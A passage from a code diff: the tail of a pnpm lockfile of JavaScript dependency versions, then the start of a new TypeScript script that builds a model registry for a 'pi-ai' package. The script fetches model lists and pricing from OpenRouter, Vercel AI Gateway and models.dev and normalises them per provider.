'@smithy/middleware-endpoint': 4.4.26 - '@smithy/middleware-retry': 4.4.43 - '@smithy/middleware-serde': 4.2.15 - '@smithy/middleware-stack': 4.2.12 - '@smithy/node-config-provider': 4.3.12 - '@smithy/node-http-handler': 4.5.0 - '@smithy/protocol-http': 5.3.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - '@smithy/util-base64': 4.3.2 - '@smithy/util-body-length-browser': 4.2.2 - '@smithy/util-body-length-node': 4.2.3 - '@smithy/util-defaults-mode-browser': 4.3.42 - '@smithy/util-defaults-mode-node': 4.2.45 - '@smithy/util-endpoints': 3.3.3 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-retry': 4.2.12 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/region-config-resolver@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/config-resolver': 4.4.11 - '@smithy/node-config-provider': 4.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/token-providers@3.1009.0': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/nested-clients': 3.996.10 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/types@3.973.6': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/util-endpoints@3.996.5': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - '@smithy/util-endpoints': 3.3.3 - tslib: 2.8.1 - - '@aws-sdk/util-format-url@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/querystring-builder': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/util-locate-window@3.965.5': - dependencies: - tslib: 2.8.1 - - '@aws-sdk/util-user-agent-browser@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/types': 4.13.1 - bowser: 2.14.1 - tslib: 2.8.1 - - '@aws-sdk/util-user-agent-node@3.973.7': - dependencies: - '@aws-sdk/middleware-user-agent': 3.972.21 - '@aws-sdk/types': 3.973.6 - '@smithy/node-config-provider': 4.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-config-provider': 4.2.2 - tslib: 2.8.1 - - '@aws-sdk/xml-builder@3.972.11': - dependencies: - '@smithy/types': 4.13.1 - fast-xml-parser: 5.4.1 - tslib: 2.8.1 - - '@aws/lambda-invoke-store@0.2.4': {} - - '@babel/runtime@7.28.6': {} - - '@google/genai@1.45.0': - dependencies: - google-auth-library: 10.6.1 - p-retry: 4.6.2 - protobufjs: 7.5.4 - ws: 8.19.0 - transitivePeerDependencies: - - bufferutil - - supports-color - - utf-8-validate - - '@isaacs/cliui@8.0.2': - dependencies: - string-width: 5.1.2 - string-width-cjs: string-width@4.2.3 - strip-ansi: 7.2.0 - strip-ansi-cjs: strip-ansi@6.0.1 - wrap-ansi: 8.1.0 - wrap-ansi-cjs: wrap-ansi@7.0.0 - - '@mistralai/mistralai@1.14.1': - dependencies: - ws: 8.19.0 - zod: 4.3.6 - zod-to-json-schema: 3.25.1(zod@4.3.6) - transitivePeerDependencies: - - bufferutil - - utf-8-validate - - '@pkgjs/parseargs@0.11.0': - optional: true - - '@protobufjs/aspromise@1.1.2': {} - - '@protobufjs/base64@1.1.2': {} - - '@protobufjs/codegen@2.0.4': {} - - '@protobufjs/eventemitter@1.1.0': {} - - '@protobufjs/fetch@1.1.0': - dependencies: - '@protobufjs/aspromise': 1.1.2 - '@protobufjs/inquire': 1.1.0 - - '@protobufjs/float@1.0.2': {} - - '@protobufjs/inquire@1.1.0': {} - - '@protobufjs/path@1.1.2': {} - - '@protobufjs/pool@1.1.0': {} - - '@protobufjs/utf8@1.1.0': {} - - '@sinclair/typebox@0.34.48': {} - - '@smithy/abort-controller@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/config-resolver@4.4.11': - dependencies: - '@smithy/node-config-provider': 4.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-config-provider': 4.2.2 - '@smithy/util-endpoints': 3.3.3 - '@smithy/util-middleware': 4.2.12 - tslib: 2.8.1 - - '@smithy/core@3.23.12': - dependencies: - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - '@smithy/util-base64': 4.3.2 - '@smithy/util-body-length-browser': 4.2.2 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-stream': 4.5.20 - '@smithy/util-utf8': 4.2.2 - '@smithy/uuid': 1.1.2 - tslib: 2.8.1 - - '@smithy/credential-provider-imds@4.2.12': - dependencies: - '@smithy/node-config-provider': 4.3.12 - '@smithy/property-provider': 4.2.12 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - tslib: 2.8.1 - - '@smithy/eventstream-codec@4.2.12': - dependencies: - '@aws-crypto/crc32': 5.2.0 - '@smithy/types': 4.13.1 - '@smithy/util-hex-encoding': 4.2.2 - tslib: 2.8.1 - - '@smithy/eventstream-serde-browser@4.2.12': - dependencies: - '@smithy/eventstream-serde-universal': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/eventstream-serde-config-resolver@4.3.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/eventstream-serde-node@4.2.12': - dependencies: - '@smithy/eventstream-serde-universal': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/eventstream-serde-universal@4.2.12': - dependencies: - '@smithy/eventstream-codec': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/fetch-http-handler@5.3.15': - dependencies: - '@smithy/protocol-http': 5.3.12 - '@smithy/querystring-builder': 4.2.12 - '@smithy/types': 4.13.1 - '@smithy/util-base64': 4.3.2 - tslib: 2.8.1 - - '@smithy/hash-node@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - '@smithy/util-buffer-from': 4.2.2 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@smithy/invalid-dependency@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/is-array-buffer@2.2.0': - dependencies: - tslib: 2.8.1 - - '@smithy/is-array-buffer@4.2.2': - dependencies: - tslib: 2.8.1 - - '@smithy/middleware-content-length@4.2.12': - dependencies: - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/middleware-endpoint@4.4.26': - dependencies: - '@smithy/core': 3.23.12 - '@smithy/middleware-serde': 4.2.15 - '@smithy/node-config-provider': 4.3.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - '@smithy/util-middleware': 4.2.12 - tslib: 2.8.1 - - '@smithy/middleware-retry@4.4.43': - dependencies: - '@smithy/node-config-provider': 4.3.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/service-error-classification': 4.2.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-retry': 4.2.12 - '@smithy/uuid': 1.1.2 - tslib: 2.8.1 - - '@smithy/middleware-serde@4.2.15': - dependencies: - '@smithy/core': 3.23.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/middleware-stack@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/node-config-provider@4.3.12': - dependencies: - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/node-http-handler@4.5.0': - dependencies: - '@smithy/abort-controller': 4.2.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/querystring-builder': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/property-provider@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/protocol-http@5.3.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/querystring-builder@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - '@smithy/util-uri-escape': 4.2.2 - tslib: 2.8.1 - - '@smithy/querystring-parser@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/service-error-classification@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - - '@smithy/shared-ini-file-loader@4.4.7': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/signature-v4@5.3.12': - dependencies: - '@smithy/is-array-buffer': 4.2.2 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-hex-encoding': 4.2.2 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-uri-escape': 4.2.2 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@smithy/smithy-client@4.12.6': - dependencies: - '@smithy/core': 3.23.12 - '@smithy/middleware-endpoint': 4.4.26 - '@smithy/middleware-stack': 4.2.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-stream': 4.5.20 - tslib: 2.8.1 - - '@smithy/types@4.13.1': - dependencies: - tslib: 2.8.1 - - '@smithy/url-parser@4.2.12': - dependencies: - '@smithy/querystring-parser': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-base64@4.3.2': - dependencies: - '@smithy/util-buffer-from': 4.2.2 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@smithy/util-body-length-browser@4.2.2': - dependencies: - tslib: 2.8.1 - - '@smithy/util-body-length-node@4.2.3': - dependencies: - tslib: 2.8.1 - - '@smithy/util-buffer-from@2.2.0': - dependencies: - '@smithy/is-array-buffer': 2.2.0 - tslib: 2.8.1 - - '@smithy/util-buffer-from@4.2.2': - dependencies: - '@smithy/is-array-buffer': 4.2.2 - tslib: 2.8.1 - - '@smithy/util-config-provider@4.2.2': - dependencies: - tslib: 2.8.1 - - '@smithy/util-defaults-mode-browser@4.3.42': - dependencies: - '@smithy/property-provider': 4.2.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-defaults-mode-node@4.2.45': - dependencies: - '@smithy/config-resolver': 4.4.11 - '@smithy/credential-provider-imds': 4.2.12 - '@smithy/node-config-provider': 4.3.12 - '@smithy/property-provider': 4.2.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-endpoints@3.3.3': - dependencies: - '@smithy/node-config-provider': 4.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-hex-encoding@4.2.2': - dependencies: - tslib: 2.8.1 - - '@smithy/util-middleware@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-retry@4.2.12': - dependencies: - '@smithy/service-error-classification': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-stream@4.5.20': - dependencies: - '@smithy/fetch-http-handler': 5.3.15 - '@smithy/node-http-handler': 4.5.0 - '@smithy/types': 4.13.1 - '@smithy/util-base64': 4.3.2 - '@smithy/util-buffer-from': 4.2.2 - '@smithy/util-hex-encoding': 4.2.2 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@smithy/util-uri-escape@4.2.2': - dependencies: - tslib: 2.8.1 - - '@smithy/util-utf8@2.3.0': - dependencies: - '@smithy/util-buffer-from': 2.2.0 - tslib: 2.8.1 - - '@smithy/util-utf8@4.2.2': - dependencies: - '@smithy/util-buffer-from': 4.2.2 - tslib: 2.8.1 - - '@smithy/uuid@1.1.2': - dependencies: - tslib: 2.8.1 - - '@tootallnate/quickjs-emscripten@0.23.0': {} - - '@types/node@25.5.0': - dependencies: - undici-types: 7.18.2 - - '@types/retry@0.12.0': {} - - agent-base@7.1.4: {} - - ajv-formats@3.0.1(ajv@8.18.0): - optionalDependencies: - ajv: 8.18.0 - - ajv@8.18.0: - dependencies: - fast-deep-equal: 3.1.3 - fast-uri: 3.1.0 - json-schema-traverse: 1.0.0 - require-from-string: 2.0.2 - - ansi-regex@5.0.1: {} - - ansi-regex@6.2.2: {} - - ansi-styles@4.3.0: - dependencies: - color-convert: 2.0.1 - - ansi-styles@6.2.3: {} - - ast-types@0.13.4: - dependencies: - tslib: 2.8.1 - - balanced-match@1.0.2: {} - - base64-js@1.5.1: {} - - basic-ftp@5.2.0: {} - - bignumber.js@9.3.1: {} - - bowser@2.14.1: {} - - brace-expansion@2.0.2: - dependencies: - balanced-match: 1.0.2 - - buffer-equal-constant-time@1.0.1: {} - - chalk@5.6.2: {} - - color-convert@2.0.1: - dependencies: - color-name: 1.1.4 - - color-name@1.1.4: {} - - cross-spawn@7.0.6: - dependencies: - path-key: 3.1.1 - shebang-command: 2.0.0 - which: 2.0.2 - - data-uri-to-buffer@4.0.1: {} - - data-uri-to-buffer@6.0.2: {} - - debug@4.4.3: - dependencies: - ms: 2.1.3 - - degenerator@5.0.1: - dependencies: - ast-types: 0.13.4 - escodegen: 2.1.0 - esprima: 4.0.1 - - eastasianwidth@0.2.0: {} - - ecdsa-sig-formatter@1.0.11: - dependencies: - safe-buffer: 5.2.1 - - emoji-regex@8.0.0: {} - - emoji-regex@9.2.2: {} - - escodegen@2.1.0: - dependencies: - esprima: 4.0.1 - estraverse: 5.3.0 - esutils: 2.0.3 - optionalDependencies: - source-map: 0.6.1 - - esprima@4.0.1: {} - - estraverse@5.3.0: {} - - esutils@2.0.3: {} - - extend@3.0.2: {} - - fast-deep-equal@3.1.3: {} - - fast-uri@3.1.0: {} - - fast-xml-builder@1.1.4: - dependencies: - path-expression-matcher: 1.1.3 - - fast-xml-parser@5.4.1: - dependencies: - fast-xml-builder: 1.1.4 - strnum: 2.2.0 - - fetch-blob@3.2.0: - dependencies: - node-domexception: 1.0.0 - web-streams-polyfill: 3.3.3 - - foreground-child@3.3.1: - dependencies: - cross-spawn: 7.0.6 - signal-exit: 4.1.0 - - formdata-polyfill@4.0.10: - dependencies: - fetch-blob: 3.2.0 - - gaxios@7.1.3: - dependencies: - extend: 3.0.2 - https-proxy-agent: 7.0.6 - node-fetch: 3.3.2 - rimraf: 5.0.10 - transitivePeerDependencies: - - supports-color - - gcp-metadata@8.1.2: - dependencies: - gaxios: 7.1.3 - google-logging-utils: 1.1.3 - json-bigint: 1.0.0 - transitivePeerDependencies: - - supports-color - - get-uri@6.0.5: - dependencies: - basic-ftp: 5.2.0 - data-uri-to-buffer: 6.0.2 - debug: 4.4.3 - transitivePeerDependencies: - - supports-color - - glob@10.5.0: - dependencies: - foreground-child: 3.3.1 - jackspeak: 3.4.3 - minimatch: 9.0.9 - minipass: 7.1.3 - package-json-from-dist: 1.0.1 - path-scurry: 1.11.1 - - google-auth-library@10.6.1: - dependencies: - base64-js: 1.5.1 - ecdsa-sig-formatter: 1.0.11 - gaxios: 7.1.3 - gcp-metadata: 8.1.2 - google-logging-utils: 1.1.3 - jws: 4.0.1 - transitivePeerDependencies: - - supports-color - - google-logging-utils@1.1.3: {} - - http-proxy-agent@7.0.2: - dependencies: - agent-base: 7.1.4 - debug: 4.4.3 - transitivePeerDependencies: - - supports-color - - https-proxy-agent@7.0.6: - dependencies: - agent-base: 7.1.4 - debug: 4.4.3 - transitivePeerDependencies: - - supports-color - - ip-address@10.1.0: {} - - is-fullwidth-code-point@3.0.0: {} - - isexe@2.0.0: {} - - jackspeak@3.4.3: - dependencies: - '@isaacs/cliui': 8.0.2 - optionalDependencies: - '@pkgjs/parseargs': 0.11.0 - - json-bigint@1.0.0: - dependencies: - bignumber.js: 9.3.1 - - json-schema-to-ts@3.1.1: - dependencies: - '@babel/runtime': 7.28.6 - ts-algebra: 2.0.0 - - json-schema-traverse@1.0.0: {} - - jwa@2.0.1: - dependencies: - buffer-equal-constant-time: 1.0.1 - ecdsa-sig-formatter: 1.0.11 - safe-buffer: 5.2.1 - - jws@4.0.1: - dependencies: - jwa: 2.0.1 - safe-buffer: 5.2.1 - - long@5.3.2: {} - - lru-cache@10.4.3: {} - - lru-cache@7.18.3: {} - - minimatch@9.0.9: - dependencies: - brace-expansion: 2.0.2 - - minipass@7.1.3: {} - - ms@2.1.3: {} - - netmask@2.0.2: {} - - node-domexception@1.0.0: {} - - node-fetch@3.3.2: - dependencies: - data-uri-to-buffer: 4.0.1 - fetch-blob: 3.2.0 - formdata-polyfill: 4.0.10 - - openai@6.26.0(ws@8.19.0)(zod@4.3.6): - optionalDependencies: - ws: 8.19.0 - zod: 4.3.6 - - p-retry@4.6.2: - dependencies: - '@types/retry': 0.12.0 - retry: 0.13.1 - - pac-proxy-agent@7.2.0: - dependencies: - '@tootallnate/quickjs-emscripten': 0.23.0 - agent-base: 7.1.4 - debug: 4.4.3 - get-uri: 6.0.5 - http-proxy-agent: 7.0.2 - https-proxy-agent: 7.0.6 - pac-resolver: 7.0.1 - socks-proxy-agent: 8.0.5 - transitivePeerDependencies: - - supports-color - - pac-resolver@7.0.1: - dependencies: - degenerator: 5.0.1 - netmask: 2.0.2 - - package-json-from-dist@1.0.1: {} - - path-expression-matcher@1.1.3: {} - - path-key@3.1.1: {} - - path-scurry@1.11.1: - dependencies: - lru-cache: 10.4.3 - minipass: 7.1.3 - - protobufjs@7.5.4: - dependencies: - '@protobufjs/aspromise': 1.1.2 - '@protobufjs/base64': 1.1.2 - '@protobufjs/codegen': 2.0.4 - '@protobufjs/eventemitter': 1.1.0 - '@protobufjs/fetch': 1.1.0 - '@protobufjs/float': 1.0.2 - '@protobufjs/inquire': 1.1.0 - '@protobufjs/path': 1.1.2 - '@protobufjs/pool': 1.1.0 - '@protobufjs/utf8': 1.1.0 - '@types/node': 25.5.0 - long: 5.3.2 - - proxy-agent@6.5.0: - dependencies: - agent-base: 7.1.4 - debug: 4.4.3 - http-proxy-agent: 7.0.2 - https-proxy-agent: 7.0.6 - lru-cache: 7.18.3 - pac-proxy-agent: 7.2.0 - proxy-from-env: 1.1.0 - socks-proxy-agent: 8.0.5 - transitivePeerDependencies: - - supports-color - - proxy-from-env@1.1.0: {} - - require-from-string@2.0.2: {} - - retry@0.13.1: {} - - rimraf@5.0.10: - dependencies: - glob: 10.5.0 - - safe-buffer@5.2.1: {} - - shebang-command@2.0.0: - dependencies: - shebang-regex: 3.0.0 - - shebang-regex@3.0.0: {} - - signal-exit@4.1.0: {} - - smart-buffer@4.2.0: {} - - socks-proxy-agent@8.0.5: - dependencies: - agent-base: 7.1.4 - debug: 4.4.3 - socks: 2.8.7 - transitivePeerDependencies: - - supports-color - - socks@2.8.7: - dependencies: - ip-address: 10.1.0 - smart-buffer: 4.2.0 - - source-map@0.6.1: - optional: true - - string-width@4.2.3: - dependencies: - emoji-regex: 8.0.0 - is-fullwidth-code-point: 3.0.0 - strip-ansi: 6.0.1 - - string-width@5.1.2: - dependencies: - eastasianwidth: 0.2.0 - emoji-regex: 9.2.2 - strip-ansi: 7.2.0 - - strip-ansi@6.0.1: - dependencies: - ansi-regex: 5.0.1 - - strip-ansi@7.2.0: - dependencies: - ansi-regex: 6.2.2 - - strnum@2.2.0: {} - - ts-algebra@2.0.0: {} - - tslib@2.8.1: {} - - undici-types@7.18.2: {} - - undici@7.24.4: {} - - web-streams-polyfill@3.3.3: {} - - which@2.0.2: - dependencies: - isexe: 2.0.0 - - wrap-ansi@7.0.0: - dependencies: - ansi-styles: 4.3.0 - string-width: 4.2.3 - strip-ansi: 6.0.1 - - wrap-ansi@8.1.0: - dependencies: - ansi-styles: 6.2.3 - string-width: 5.1.2 - strip-ansi: 7.2.0 - - ws@8.19.0: {} - - zod-to-json-schema@3.25.1(zod@4.3.6): - dependencies: - zod: 4.3.6 - - zod@4.3.6: {} diff --git a/packages/pi-ai/scripts/generate-models.ts b/packages/pi-ai/scripts/generate-models.ts new file mode 100644 index 000000000..839428bcb --- /dev/null +++ b/packages/pi-ai/scripts/generate-models.ts @@ -0,0 +1,1543 @@ +#!/usr/bin/env tsx + +import { writeFileSync } from "fs"; +import { join, dirname } from "path"; +import { fileURLToPath } from "url"; +import { Api, KnownProvider, Model } from "../src/types.js"; + +const __filename = fileURLToPath(import.meta.url); +const __dirname = dirname(__filename); +const packageRoot = join(__dirname, ".."); + +interface ModelsDevModel { + id: string; + name: string; + tool_call?: boolean; + reasoning?: boolean; + limit?: { + context?: number; + output?: number; + }; + cost?: { + input?: number; + output?: number; + cache_read?: number; + cache_write?: number; + }; + modalities?: { + input?: string[]; + }; + provider?: { + npm?: string; + }; +} + +interface AiGatewayModel { + id: string; + name?: string; + context_window?: number; + max_tokens?: number; + tags?: string[]; + pricing?: { + input?: string | number; + output?: string | number; + input_cache_read?: string | number; + input_cache_write?: string | number; + }; +} + +const COPILOT_STATIC_HEADERS = { + "User-Agent": "GitHubCopilotChat/0.35.0", + "Editor-Version": "vscode/1.107.0", + "Editor-Plugin-Version": "copilot-chat/0.35.0", + "Copilot-Integration-Id": "vscode-chat", +} as const; + +const AI_GATEWAY_MODELS_URL = "https://ai-gateway.vercel.sh/v1"; +const AI_GATEWAY_BASE_URL = "https://ai-gateway.vercel.sh"; + +async function fetchOpenRouterModels(): Promise[]> { + try { + console.log("Fetching models from OpenRouter API..."); + const response = await fetch("https://openrouter.ai/api/v1/models"); + const data = await response.json(); + + const models: Model[] = []; + + for (const model of data.data) { + // Only include models that support tools + if (!model.supported_parameters?.includes("tools")) continue; + + // Parse provider from model ID + let provider: KnownProvider = "openrouter"; + let modelKey = model.id; + + modelKey = model.id; // Keep full ID for OpenRouter + + // Parse input modalities + const input: ("text" | "image")[] = ["text"]; + if (model.architecture?.modality?.includes("image")) { + input.push("image"); + } + + // Convert pricing from $/token to $/million tokens + const inputCost = parseFloat(model.pricing?.prompt || "0") * 1_000_000; + const outputCost = parseFloat(model.pricing?.completion || "0") * 1_000_000; + const cacheReadCost = parseFloat(model.pricing?.input_cache_read || "0") * 1_000_000; + const cacheWriteCost = parseFloat(model.pricing?.input_cache_write || "0") * 1_000_000; + + const normalizedModel: Model = { + id: modelKey, + name: model.name, + api: "openai-completions", + baseUrl: "https://openrouter.ai/api/v1", + provider, + reasoning: model.supported_parameters?.includes("reasoning") || false, + input, + cost: { + input: inputCost, + output: outputCost, + cacheRead: cacheReadCost, + cacheWrite: cacheWriteCost, + }, + contextWindow: model.context_length || 4096, + maxTokens: model.top_provider?.max_completion_tokens || 4096, + }; + models.push(normalizedModel); + } + + console.log(`Fetched ${models.length} tool-capable models from OpenRouter`); + return models; + } catch (error) { + console.error("Failed to fetch OpenRouter models:", error); + return []; + } +} + +async function fetchAiGatewayModels(): Promise[]> { + try { + console.log("Fetching models from Vercel AI Gateway API..."); + const response = await fetch(`${AI_GATEWAY_MODELS_URL}/models`); + const data = await response.json(); + const models: Model[] = []; + + const toNumber = (value: string | number | undefined): number => { + if (typeof value === "number") { + return Number.isFinite(value) ? value : 0; + } + const parsed = parseFloat(value ?? "0"); + return Number.isFinite(parsed) ? parsed : 0; + }; + + const items = Array.isArray(data.data) ? (data.data as AiGatewayModel[]) : []; + for (const model of items) { + const tags = Array.isArray(model.tags) ? model.tags : []; + // Only include models that support tools + if (!tags.includes("tool-use")) continue; + + const input: ("text" | "image")[] = ["text"]; + if (tags.includes("vision")) { + input.push("image"); + } + + const inputCost = toNumber(model.pricing?.input) * 1_000_000; + const outputCost = toNumber(model.pricing?.output) * 1_000_000; + const cacheReadCost = toNumber(model.pricing?.input_cache_read) * 1_000_000; + const cacheWriteCost = toNumber(model.pricing?.input_cache_write) * 1_000_000; + + models.push({ + id: model.id, + name: model.name || model.id, + api: "anthropic-messages", + baseUrl: AI_GATEWAY_BASE_URL, + provider: "vercel-ai-gateway", + reasoning: tags.includes("reasoning"), + input, + cost: { + input: inputCost, + output: outputCost, + cacheRead: cacheReadCost, + cacheWrite: cacheWriteCost, + }, + contextWindow: model.context_window || 4096, + maxTokens: model.max_tokens || 4096, + }); + } + + console.log(`Fetched ${models.length} tool-capable models from Vercel AI Gateway`); + return models; + } catch (error) { + console.error("Failed to fetch Vercel AI Gateway models:", error); + return []; + } +} + +async function loadModelsDevData(): Promise[]> { + try { + console.log("Fetching models from models.dev API..."); + const response = await fetch("https://models.dev/api.json"); + const data = await response.json(); + + const models: Model[] = []; + + // Process Amazon Bedrock models + if (data["amazon-bedrock"]?.models) { + for (const [modelId, model] of Object.entries(data["amazon-bedrock"].models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + let id = modelId; + + if (id.startsWith("ai21.jamba")) { + // These models doesn't support tool use in streaming mode + continue; + } + + if (id.startsWith("mistral.mistral-7b-instruct-v0")) { + // These models doesn't support system messages + continue; + } + + models.push({ + id, + name: m.name || id, + api: "bedrock-converse-stream" as const, + provider: "amazon-bedrock" as const, + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: m.reasoning === true, + input: (m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"]) as ("text" | "image")[], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Anthropic models + if (data.anthropic?.models) { + for (const [modelId, model] of Object.entries(data.anthropic.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "anthropic-messages", + provider: "anthropic", + baseUrl: "https://api.anthropic.com", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Google models + if (data.google?.models) { + for (const [modelId, model] of Object.entries(data.google.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "google-generative-ai", + provider: "google", + baseUrl: "https://generativelanguage.googleapis.com/v1beta", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process OpenAI models + if (data.openai?.models) { + for (const [modelId, model] of Object.entries(data.openai.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-responses", + provider: "openai", + baseUrl: "https://api.openai.com/v1", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Groq models + if (data.groq?.models) { + for (const [modelId, model] of Object.entries(data.groq.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-completions", + provider: "groq", + baseUrl: "https://api.groq.com/openai/v1", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Cerebras models + if (data.cerebras?.models) { + for (const [modelId, model] of Object.entries(data.cerebras.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-completions", + provider: "cerebras", + baseUrl: "https://api.cerebras.ai/v1", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process xAi models + if (data.xai?.models) { + for (const [modelId, model] of Object.entries(data.xai.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-completions", + provider: "xai", + baseUrl: "https://api.x.ai/v1", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process zAi models + if (data.zai?.models) { + for (const [modelId, model] of Object.entries(data.zai.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + const supportsImage = m.modalities?.input?.includes("image") + + models.push({ + id: modelId, + name: 